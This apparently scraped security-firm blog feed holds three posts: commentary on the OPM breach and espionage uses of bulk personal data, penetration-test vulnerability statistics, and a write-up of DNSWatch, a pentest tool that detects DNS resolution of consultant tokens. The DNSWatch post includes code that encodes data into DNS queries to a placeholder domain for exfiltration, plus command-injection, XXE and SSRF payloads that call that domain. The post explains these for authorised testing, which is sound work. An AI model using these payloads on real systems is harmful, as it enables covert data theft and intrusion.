The recent cyber-attack against the Office of Personnel Management (OPM) has resulted in the compromise of data relating to millions of current and former United States (US) government employees.

In a separate attack against OPM early last year, information relating to individuals who were either seeking to obtain or who had already obtained security clearances was also compromised. The extent of the information lost was vast and included details of the background investigations and checks that led to US government officials being granted security clearances.

The Chinese government is suspected, by various non-official sources [1], of being linked to this attack and other similar attacks in which huge amounts of Personally Identifiable Information (PII) have been stolen; for example, the attacks on the US Postal Service, health insurer Anthem and healthcare provider Premera Blue Cross. The Chinese government has, of course, denied all involvement.

However, all of these attacks have raised some interesting points for discussion. What would a foreign intelligence service do with huge swathes of PII? Cyber-criminals would of course sell this information on the black market soon after obtaining it, and PII is now worth more than banking credentials in these circles. However, information relating to all of the above breaches is yet to appear in criminal forums, further indicating that a foreign intelligence service is linked to these attacks.

The targeting of large data sets by a foreign intelligence service suggests that there is a sophisticated capability complementing, and potentially driving forward, the cyber operations collecting this data: a capability that can make connections, spot patterns and draw inferences between diverse collections of data. These huge data sets would be impossible to interrogate without sophisticated software allowing the data to be manipulated and used in new ways through the generation of complex queries.

This type of activity is already being used in the commercial world (and to be honest has most likely been used for a long time in the intelligence world). For example, Facebook has a Data Science Team. This team has reportedly developed ways to interrogate the data collected by Facebook in order to predict a user’s political views, their emotional stability and even when they are likely to split up with their partner!

In the same way that data collected via social media can be interrogated commercially to target products more effectively or to profile users, large data sets obtained in offensive cyber espionage operations could be interrogated by a foreign intelligence agency to improve the effectiveness of its operational targeting: not just for follow-on cyber-attacks, but also to highlight individuals who may be susceptible to coercion or recruitment as human intelligence sources, or to identify those who would be vulnerable to other technical operations. The end goal of these operations would be the collection of intelligence along political, military and commercial lines. The possibilities are endless and, when combined with data that is already in the public domain (like information on social media), this makes for a truly spectacular capability.

Cyber espionage is usually associated with the theft of intellectual property. However, in reality the scope is much broader. Cyber has revolutionised the way traditional espionage is conducted. And, through utilisation of offensive cyber capabilities, a much broader range of information is available to a foreign intelligence service than ever before. This information can be obtained quickly, with very little risk. When you add to this equation the use of ‘big data’ techniques in order to interrogate this information, it makes for a very powerful capability that can drive and dictate further intelligence collection opportunities. In addition, what should not be underestimated is the significant resource at the disposal of a foreign intelligence service. They have a wide range of capabilities, of which cyber is just one tool. These capabilities can be used interchangeably and are complementary.

All data is valuable. You may think that your data (whether commercial or personal) would not be of interest to a foreign intelligence service or criminal group. However, when that data is combined with other sources of information already in the hostile entity's possession, it becomes a lot more valuable and exploitable.

[1]: http://www.usatoday.com/story/news/nation/2015/06/04/obama-office-of-personnel-management-data-breach/28495775/
http://fedscoop.com/researchers-link-chinese-to-anthem-opm-hacks
http://www.washingtontimes.com/news/2015/jun/5/chinese-opm-hackers-also-behind-massive-health-car/

Vulnerability Statistics & Trends in 2015

$
0
0

I have conducted research using Context’s penetration testing management database across 3,475 web application and infrastructure penetration tests for the years 2013, 2014 & 2015. The research included a statistical analysis of the quantity, severity and exploitability of the findings we identified within our penetration tests. This analysis yielded the following high level points:

  • The number of vulnerabilities discovered in application assessments remains consistent at around 9 findings per test, but infrastructure engagements show a decline in the number of vulnerabilities discovered (23.3 to 12.1 per test for external infrastructure, and 32.8 to 23.0 per test for internal infrastructure).
  • The proportion of high impact vulnerabilities has also remained consistent for applications (16%), but again infrastructure shows a steady decline from an initially high starting point (20.2% to 8.2% for external infrastructure, and 28.9% to 15.9% for internal infrastructure).
  • The proportion of high impact vulnerabilities that are considered easy to exploit has remained consistent for both applications (~35%) and internal infrastructure (~85%) engagements, but external infrastructure, while still quite high (57%), has dropped in 2015.

So far in 2015, our statistics suggest that approximately 1 in every 2 application or external infrastructure tests possesses an easily exploitable, high impact vulnerability. For internal infrastructure, there are over 3 high impact, easily exploited vulnerabilities per test.
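As a sanity check, these headline rates follow directly from the 2015 per-test averages and proportions quoted above (a rough sketch using the rounded published figures):

```python
# (average findings per test, share rated high impact, share of those easily exploited)
figures = {
    "application":    (9.0, 0.16, 0.35),
    "external infra": (12.1, 0.082, 0.57),
    "internal infra": (23.0, 0.159, 0.85),
}

for test_type, (findings, high_share, easy_share) in figures.items():
    per_test = findings * high_share * easy_share
    print(f"{test_type}: ~{per_test:.1f} easily exploited, high impact findings per test")
```

This reproduces roughly 0.5 per test for applications and external infrastructure (i.e. about 1 in 2 tests) and just over 3 per test for internal infrastructure.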

This average has been consistent for application assessments since 2013, suggesting that application security is neither getting substantially worse nor better. However, both external and internal infrastructure tests have been showing improved security postures, with decreasing numbers of total findings and a smaller share of high impact findings present.

Context attributes this change to the remediation advice we provide to our customers. Most assurance work we undertake, particularly for new customers, will typically be for web applications. These applications may not have received assurance work before, and as a result will often have more serious vulnerabilities. This balances out against the improving security observed with existing customers, leading to consistent statistics over the timeframe.

Infrastructure work on the other hand is more often requested by customers Context has a prior working relationship with, and over time the security measures in place will begin to improve as they follow our remediation advice.

Average Number of Vulnerabilities

An assessment of the average number of vulnerabilities per test for web application assessments was carried out. The following table shows the result:

[Table: average vulnerabilities per test for web application assessments, 2013-2015]
These results show that the average number of findings, proportion of high impact findings and easily exploited high impact findings has remained relatively consistent over the period analysed for web application assessments.

Contrastingly, the results for infrastructure assessments – which can be split into external and internal infrastructure – suggest that these numbers are reducing:

[Tables: average vulnerabilities per test for external and internal infrastructure assessments, 2013-2015]

The results suggest that external infrastructure engagements are beginning to resemble application security assessments in terms of the number and severity of findings. However, any high impact findings discovered in an external infrastructure test are still much more likely to be easily exploited (35.6% vs 57.4%). This may be due to the consistently active development of attack frameworks such as Metasploit, which make exploiting an infrastructure vulnerability a simple exercise available to attackers without an in-depth understanding of the vulnerability itself.

The trends have also shown that internal infrastructure engagements have on average fewer vulnerabilities than in previous years, though the totals remain substantially higher than for other test types, averaging 9 for applications, 12 for external infrastructure and 23 for internal infrastructure in 2015.

One possible explanation for the prevalence of vulnerabilities within internal infrastructure would be the implicit trust given to employees, with administrators more concerned about external threats. This would explain why the number of external infrastructure vulnerabilities has dropped significantly, but it also suggests that a malicious insider remains a substantial threat to the security of an organisation’s networks.

High Impact Findings

Context assigns impact ratings for each finding, with the most common being Critical, High, Medium and Low. High impact vulnerabilities are those that would normally result in an attacker gaining unauthorised access, or a compromise of user data or application functionality that could lead to financial or legal impact.

Application

Since 2013, application findings graded as having a high impact or above have remained constant, at around 16% each year. This averages out to just over 1 high impact finding for each application test.


Infrastructure

In addition to the decreasing number of vulnerabilities discovered in infrastructure tests, the proportion of these findings that have a high impact has also been decreasing. This decrease has taken the proportion of high impact findings for external infrastructure from 20.2% in 2013 to only 8.2% in 2015.



Internal infrastructure has shown a similar decrease; high impact findings made up 28.9% of all vulnerabilities in 2013, falling to 15.9% in 2015.


High & Easily Exploited Vulnerabilities

Identified findings are rated according to impact; however, an "ease of exploitation" rating is also assigned to each finding, describing the skill or knowledge level required to exploit the relevant issue. Easily exploitable vulnerabilities are those that can be exploited within a short period of time by an attacker possessing a low level of knowledge or a beginner skillset, possibly using a well-publicised exploit.

Across all three years, application and internal infrastructure engagements have yielded consistent difficulty ratings for high impact findings. For applications, approximately 35% of high impact findings are considered easy to exploit; for internal infrastructure, typically 80% to 90% of high impact vulnerabilities are easily exploitable.



External infrastructure again shows a decrease, with the proportion of easily exploited high impact findings going from around 75% down to under 60%.

Follow Up and Contact

Steve is a part of our Assurance team based in our Cheltenham office.

DNSWatch - When a full DNS tunnel is just too much

$
0
0

During certain engagements it is a requirement to extract data from a network - or at least to prove that it would be possible in different ways. One common and very well-known way to do this is to exfiltrate data using DNS tunnels. Previously we’ve looked into options for quickly identifying whether DNS tunnelling is possible during a penetration test. Later this became helpful with a wider range of our services too - like Red Team engagements. We reviewed several ideas and existing tools, but none of them were flexible enough to do what we needed, and that's when I came up with the simple idea of DNSWatch.

The concept behind DNS tunnels is not ground breaking and is very well known within the industry, but the following provides an insight into the work we did, and offers an example of how we turn ideas into developed services.

In the following blog post I will explain how we set up our systems to support the potential identification of DNS tunnels, but also how this system can be used to help detect common vulnerabilities. 

While nothing is wrong with the known methods (or just starting a sniffer), our methodology becomes useful when, having initiated a DNS query, you would like to be notified quickly and easily that the requested name was resolved, perhaps even with some content leaked from the target system.

So this is how it works:

[Diagram: DNS tunnel name-resolution flow from the Target to the Context DNS Tunnel-Server]

In the above example the "Target" would initiate a name resolution of the "Context DNS Tunnel" domain by requesting the record from its default name server. This "Target Nameserver" would then query the corresponding name server for a specific zone (1. Rootserver, 2. ".com Nameserver", 3. "Context Nameserver"). The Context name server delegates the control of the DNS subdomain to our DNS Tunnel-Server which contains the below script. We can now take the query that we have received and send it (in our case via email) to one of our consultants.

Because we have many consultants at Context, each consultant is given their own "DNS Token" (sub-domain), which is then mapped to the corresponding email address.

The following is an example to generate this token:

...
# requires: import random, string; `email` holds the consultant's address
# store everything before @domain.tld and clean up
name=email[:email.find('@')].replace('.','')
# append a 32-character random token to the name
token=name+''.join(random.SystemRandom().choice(string.ascii_lowercase + string.digits) for _ in range(32))
...

The script itself is straightforward:

...
# requires: import csv, time; from scapy.all import sniff (and smtplib for sendmymail)
PEOPLES=[]
with open('consultants.csv') as csvfile:
 reader = csv.reader(csvfile, delimiter=',', quoting=csv.QUOTE_NONE)
 for row in reader:
  PEOPLES.append([row[0].lower(),row[1],int(time.time())])

def findConsultant(packet):
 # save the source IP as a string
 SRCIP=str(packet.payload.src)
 # save the queried domain as a string
 DSTDOMAIN=str(packet.payload.payload.payload.qd.qname).lower()
 if TUNNELDOMAIN in DSTDOMAIN and not "polling" in DSTDOMAIN:
  # loop through our people
  for PEOPLE in PEOPLES:
   # in case the domain name queried matches a defined record
   if PEOPLE[0] in DSTDOMAIN:
    # send the email to the address that matches that domain
    if "burp" in DSTDOMAIN:
     MSG="From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (FROM, PEOPLE[1], SUBJB)
     TEXT="Burp performed an injection which was used to resolve your personal unique domain name (%s). The origin IP is: %s\nYou should check the logs for the token to find the issue" % (DSTDOMAIN, SRCIP)
    else:
     MSG="From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (FROM, PEOPLE[1], SUBJA)
     TEXT="A system made an attempt to resolve your personal unique domain name (%s). The origin IP is: %s" % (DSTDOMAIN, SRCIP)
    sendmymail(FROM, PEOPLE[1], MSG, TEXT)
    # update the timestamp
    PEOPLE[2]=int(time.time())
...
  failed = server.sendmail(FROM, TO, MSG+TEXT)
...
   res=sniff(filter="udp dst port 53", prn=findConsultant)
...

The DNSWatch script sniffs any traffic destined for UDP port 53 and passes each packet to a processing function. That function loops through the defined list of consultant tokens and checks whether the tunnel domain and a token appear in the queried name. The final step is to collect the required information from the received packet and deliver an email to the correct consultant.

Those are the basics of this simple script. To identify whether a DNS tunnel would be possible, we just need to query our name and wait for an email to arrive. Of course, this could partially be achieved by querying any domain name we control, provided the output can be observed. However, with the little extra code we have added, we can also extract small pieces of content by prepending them to our token, for example as an additional sub-domain, and we can do this completely blind. A sample email received looks like this:


In this example the value:
TGludXgga2FsaTEgMy4xNC1rYWxpMS02ODYtcGFlICMxIFNNUCBEZWJpYW4gMy4xNC41LTFrYWxpMSAoMjAxNC0wNi0wNykgaTY4NiBHTlUvTGludXgK

...is decoded as base64:

Linux kali1 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux

…and is an example of the output of the "uname -a" command on Unix. Please note that each sub-domain ("label") has a maximum length of 63 characters, and a full domain name is limited to 253 characters in total.
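Building such a query name can be sketched as follows. The token domain is a hypothetical placeholder; also note that standard Base64 uses "+", "/" and "=", which are not valid host-name characters, and DNS is case-insensitive, so a DNS-safe alphabet (or Base32/hex) is more robust in practice:

```python
import base64

TOKEN = "svenabc123.tunnel.example.com"  # hypothetical consultant token domain

def exfil_name(data: bytes, token: str = TOKEN) -> str:
    # Base64-encode the payload, drop padding and swap '+'/'/' for DNS-safe characters
    encoded = base64.b64encode(data).decode().rstrip("=").replace("+", "-").replace("/", "_")
    # each DNS label may be at most 63 characters long
    labels = [encoded[i:i + 63] for i in range(0, len(encoded), 63)]
    name = ".".join(labels + [token])
    # a full domain name may be at most 253 characters
    if len(name) > 253:
        raise ValueError("payload too large for a single query")
    return name
```

On the target, the resulting name can then be resolved with a stock tool such as nslookup or dig, causing the listening server to receive (and email) the embedded payload.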

We have found the script useful on a number of occasions where a full backdoor is not necessary to prove the potential for code execution or data exfiltration, as well as for identifying or assisting in vulnerability testing. When performing an application test, certain checks can be performed that will generate an email if the application is vulnerable. The following table provides an overview of some of these simple checks:
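By way of illustration only (the payload strings and token domain below are hypothetical examples, not the exact checks we use), such payloads simply embed the unique domain wherever an out-of-band lookup might be triggered:

```python
TOKEN = "svenabc123.tunnel.example.com"  # hypothetical consultant token domain

# a few classic out-of-band checks that cause a DNS lookup if the flaw exists
PAYLOADS = {
    "os command injection": "; nslookup %s" % TOKEN,
    "xxe": '<!DOCTYPE x [<!ENTITY xxe SYSTEM "http://%s/">]><x>&xxe;</x>' % TOKEN,
    "ssrf": "http://%s/" % TOKEN,
}

for check, payload in PAYLOADS.items():
    print("%s -> %s" % (check, payload))
```

If any of these lands in a vulnerable sink, the resulting lookup for the unique domain reaches our server and triggers the notification email, even when the application itself returns no visible output.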


A new feature of Burp Suite is the "Burp Collaborator" (http://blog.portswigger.net/2015/04/introducing-burp-collaborator.html), which uses DNS to detect otherwise undetectable injections ("super blind injections") in an automated fashion. In fact, it turns out that PortSwigger used the same technique as the basis for the Collaborator server. When an injection has been discovered, an email containing the "token" is generated. This token can then be found in the Burp log to analyse and verify the root cause. An example is provided below:


The corresponding request/response (from the log) in Burp Suite is:


The log entry and retest showed that there is a command injection in the application; the injected "nslookup" command performed a DNS lookup and thereby proved the vulnerability.

You therefore have two options for using DNS to detect web application issues: automated testing via Burp Suite's "active scan", or support for your manual testing. Context has used the latter with great success for some years, performing tests with a list of payloads that embed your unique domain name.

Thanks to my colleague Jamie for setting up the DNS Server and Dan for adding the logging and daemon part to my script.

The full version of the scripts can be found on our github: https://github.com/ctxis/DNSWatch

Contact and Follow-Up

Sven is a part of our Assurance team in Context's Essen office. See the Contact page for how to get in touch.